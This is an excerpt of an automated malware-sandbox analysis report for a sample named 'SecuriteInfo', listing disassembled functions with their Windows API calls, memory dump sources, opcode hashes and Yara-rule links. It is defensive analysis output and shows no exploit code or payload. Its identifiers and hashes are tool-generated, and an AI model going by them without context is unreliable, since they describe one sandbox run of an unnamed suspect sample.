                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer$HeapPathProcess
                                                                                                                                                                        • String ID: \\?\$\\?\UNC\
                                                                                                                                                                        • API String ID: 806983814-3019864461
                                                                                                                                                                        • Opcode ID: fd935633b1e77abf78924d6151f213bae8a6b34156dddc357f98f438a04b0bbd
                                                                                                                                                                        • Instruction ID: 7956195101869b83a37674d2b37ae8da8649678f130089431b51d744b51ace79
                                                                                                                                                                        • Opcode Fuzzy Hash: fd935633b1e77abf78924d6151f213bae8a6b34156dddc357f98f438a04b0bbd
                                                                                                                                                                        • Instruction Fuzzy Hash: 73C16E7190060A9FDB00DBA9C885FAEF7F9FF45314F14826DE425E7291EB749A05CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D12040 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 00D12091
                                                                                                                                                                        • EndDialog.USER32(00000000,00000001), ref: 00D120A0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DialogWindow
                                                                                                                                                                        • String ID: |^
                                                                                                                                                                        • API String ID: 2634769047-2783013017
                                                                                                                                                                        • Opcode ID: 7378b1915c6cf18a26ef844d918e2ed1a219d06ead9584f32df051a48a6c13e0
                                                                                                                                                                        • Instruction ID: ec25cefa678a972ea87cbff29223178ae9bc7c420905b74a0c06bc192a06318e
                                                                                                                                                                        • Opcode Fuzzy Hash: 7378b1915c6cf18a26ef844d918e2ed1a219d06ead9584f32df051a48a6c13e0
                                                                                                                                                                        • Instruction Fuzzy Hash: E1518D30901745EFD711CF68C948B9AFBF4FF49310F14869DE4459B2A1DB71AA44CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D7FA13 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00CF5F3E,?,?,?,?,?,?), ref: 00D7FA18
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D7FA1F
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00D7FA65
                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D7FA6C
                                                                                                                                                                          • Part of subcall function 00D7F8B1: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F8D5
                                                                                                                                                                          • Part of subcall function 00D7F8B1: HeapAlloc.KERNEL32(00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F8DC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$Alloc$Free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1864747095-0
                                                                                                                                                                        • Opcode ID: e449bb216ff66633d5b767f342b569030333dd17d27f5dcc4afe241b7d05d303
                                                                                                                                                                        • Instruction ID: 9785defabbf8682e6c434505199c5211b710d04e266eb5916f03b18b783721c8
                                                                                                                                                                        • Opcode Fuzzy Hash: e449bb216ff66633d5b767f342b569030333dd17d27f5dcc4afe241b7d05d303
                                                                                                                                                                        • Instruction Fuzzy Hash: 6FF02473684B128BEB34277D7D0892A2A64AFC07A1701C138F4CED7240FE20C8494774
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D9A1EC Relevance: 4.7, APIs: 3, Instructions: 202COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __freea.LIBCMT ref: 00D9A39B
                                                                                                                                                                          • Part of subcall function 00D98247: RtlAllocateHeap.NTDLL(00000000,00000000,00D95FF3,?,00D9A198,?,00000000,?,00D89D85,00000000,00D95FF3,00E8EBCC,?,00E8EBC8,?,00D95DED), ref: 00D98279
                                                                                                                                                                        • __freea.LIBCMT ref: 00D9A3B0
                                                                                                                                                                        • __freea.LIBCMT ref: 00D9A3C0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __freea$AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2243444508-0
                                                                                                                                                                        • Opcode ID: 3ecc39c27af2c73bf049e22deff36ce9d926bb00fad25a529c6a0b897d182924
                                                                                                                                                                        • Instruction ID: b3833fd0b5ffed3e16cae19192c0c5b3f11c6e5fb45c54452b3232d145d2df94
                                                                                                                                                                        • Opcode Fuzzy Hash: 3ecc39c27af2c73bf049e22deff36ce9d926bb00fad25a529c6a0b897d182924
                                                                                                                                                                        • Instruction Fuzzy Hash: A8519F73600216AFEF25AFA9DC81EBB7BA9EF44750B190129FD08D6151EB31CC5087B6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CF1F00 Relevance: 4.7, APIs: 3, Instructions: 192fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000000,1FC3D414,?,?), ref: 00CF1F67
                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 00CF2074
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$PointerRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3154509469-0
                                                                                                                                                                        • Opcode ID: e3b9ae5fd750b45942531db224bfaa0359a27c8777ceaa6a445b42fe8c96e0af
                                                                                                                                                                        • Instruction ID: 1cd556b0d6bf2004714cf59e8de2f9e1d229241c726030291eaf8aef968b35c7
                                                                                                                                                                        • Opcode Fuzzy Hash: e3b9ae5fd750b45942531db224bfaa0359a27c8777ceaa6a445b42fe8c96e0af
                                                                                                                                                                        • Instruction Fuzzy Hash: 686181B1D00609EFDB04CFA9C945B9DFBB4FF09320F10426AE925A7390DB75AA14CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CEF2C0 Relevance: 4.7, APIs: 3, Instructions: 183fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1FC3D414,?,00000000,?,80004005,?,00000000), ref: 00CEF35E
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00CEF396
                                                                                                                                                                        • GetLastError.KERNEL32(?), ref: 00CEF42F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1722934493-0
                                                                                                                                                                        • Opcode ID: a70f89bb600c78879f1079ebfdb3035e8e7a45e472ff05d5353fc3fd5cc099b5
                                                                                                                                                                        • Instruction ID: 1cfbf1ce09ec0acbdb549d18732e39cdc6809da42d02f0f983f2930c67075ed9
                                                                                                                                                                        • Opcode Fuzzy Hash: a70f89bb600c78879f1079ebfdb3035e8e7a45e472ff05d5353fc3fd5cc099b5
                                                                                                                                                                        • Instruction Fuzzy Hash: BE51E471A00A469FDB10DF69C845BAAF7F1FF44320F10866EE569973E0EB31A905CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CEE380 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00CEE389
                                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DED0D0,000000FF), ref: 00CEE398
                                                                                                                                                                        • IsWindow.USER32(?), ref: 00CEE3C5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$CurrentDestroyThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2303547079-0
                                                                                                                                                                        • Opcode ID: 85c7854313a30dd90683c1b57bafdbd6e4e02b717bf030be8fe8b41e630f4bce
                                                                                                                                                                        • Instruction ID: 81f0c110e909ae7924b9a24bf10a0646ebea37ec424156249140c204fdccecac
                                                                                                                                                                        • Opcode Fuzzy Hash: 85c7854313a30dd90683c1b57bafdbd6e4e02b717bf030be8fe8b41e630f4bce
                                                                                                                                                                        • Instruction Fuzzy Hash: DAF082711157909FE3709B2AEE08B46BBD56B48B00F05190EE0D6A6AA0D7B5F848CB24
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D8B563 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,00D8B55D,?,00D850F2,?,?,1FC3D414,00D850F2,?), ref: 00D8B574
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00D8B55D,?,00D850F2,?,?,1FC3D414,00D850F2,?), ref: 00D8B57B
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00D8B58D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                        • Opcode ID: 5ff3d518859ff2c95e06178ef614734ee6c679202a95f8549b3ac7bdaa428029
                                                                                                                                                                        • Instruction ID: f613dfaeccbe4a010ef29f7a9319aecb5465e2776502f22ce4c13d438e981a63
                                                                                                                                                                        • Opcode Fuzzy Hash: 5ff3d518859ff2c95e06178ef614734ee6c679202a95f8549b3ac7bdaa428029
                                                                                                                                                                        • Instruction Fuzzy Hash: DBD09E31000944AFDF413FA2DD0D85E3F26EF44361B444161B94555131DF72999ADB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CCD360 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 217COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000000,1FC3D414), ref: 00CCD500
                                                                                                                                                                          • Part of subcall function 00CCD5C0: GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,?,?,?,80004005), ref: 00CCD5CD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer$EnvironmentFolderHeapPathProcessSpecialVariable
                                                                                                                                                                        • String ID: USERPROFILE
                                                                                                                                                                        • API String ID: 1777821646-2419442777
                                                                                                                                                                        • Opcode ID: feced6b733091b4cb1b7bf0a21621ffc2c1b27b0107a6cbeb3788fcf72a8455d
                                                                                                                                                                        • Instruction ID: 269e5a3c8a23d650bfb79b67deeb0eeaea37842100f562f115f710372de3857c
                                                                                                                                                                        • Opcode Fuzzy Hash: feced6b733091b4cb1b7bf0a21621ffc2c1b27b0107a6cbeb3788fcf72a8455d
                                                                                                                                                                        • Instruction Fuzzy Hash: F561CFB1A006099FDB14DF68CC59BAEB7F4FF44314F14866DE826DB291DB70AA04CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D84C57 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FlsAlloc.KERNEL32(?,00D81BB6,00D81AB9,00D83D4F), ref: 00D84C85
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Alloc
                                                                                                                                                                        • String ID: FlsAlloc
                                                                                                                                                                        • API String ID: 2773662609-671089009
                                                                                                                                                                        • Opcode ID: 62b4d0595288372c41183735cb468d0717df87bf83512d8da0a9eaee013d6dae
                                                                                                                                                                        • Instruction ID: 6de6daff386df8dd6e57b57df41988ca4837239416b2e13bdc25f1f12dda3f5d
                                                                                                                                                                        • Opcode Fuzzy Hash: 62b4d0595288372c41183735cb468d0717df87bf83512d8da0a9eaee013d6dae
                                                                                                                                                                        • Instruction Fuzzy Hash: 9ED02B3178172567C6007AA1ED02BBB7F8CC700FB2F040161FD88711E799634C9147D8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D7C94C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D7C943
                                                                                                                                                                          • Part of subcall function 00D7D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D7D448
                                                                                                                                                                          • Part of subcall function 00D7D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7D4B0
                                                                                                                                                                          • Part of subcall function 00D7D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7D4C1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                                                                                                                        • String ID: u
                                                                                                                                                                        • API String ID: 697777088-791765612
                                                                                                                                                                        • Opcode ID: 5df8c5e94b9fe545b2483a8586ab13f427a0510fa2e674472841b7761e3137ec
                                                                                                                                                                        • Instruction ID: c8b7ffb467c82b0f21dcc57809f3e4df3d1c1c9b1918b495654ab3719c557c3a
                                                                                                                                                                        • Opcode Fuzzy Hash: 5df8c5e94b9fe545b2483a8586ab13f427a0510fa2e674472841b7761e3137ec
                                                                                                                                                                        • Instruction Fuzzy Hash: 20B012C237E1046D3A84625DAC03C36125CC5C0B11330E12FF44CE0040F6505C041971
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D9FF9D Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00D9FACA: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00D9FAF5
                                                                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00D9FDE1,?,00000000,?,?,?), ref: 00D9FFFE
                                                                                                                                                                        • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D9FDE1,?,00000000,?,?,?), ref: 00DA0040
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 546120528-0
                                                                                                                                                                        • Opcode ID: 414048799db6f73ff3d657e3ea78d0598679f2daa290b4bba34e249bfc44abe9
                                                                                                                                                                        • Instruction ID: fc91b720aa9b74d014eaecd528a4af3bdd72bed848330090d9ae6b783fb512c1
                                                                                                                                                                        • Opcode Fuzzy Hash: 414048799db6f73ff3d657e3ea78d0598679f2daa290b4bba34e249bfc44abe9
                                                                                                                                                                        • Instruction Fuzzy Hash: 41510070A007459EDB20CF75C881BAABFF4EF46304F18856EE096C7251D675994ACB70
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CEE180 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(00CEDAE1), ref: 00CEE180
                                                                                                                                                                        • DestroyWindow.USER32(00000000,?,00000000), ref: 00CEE237
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
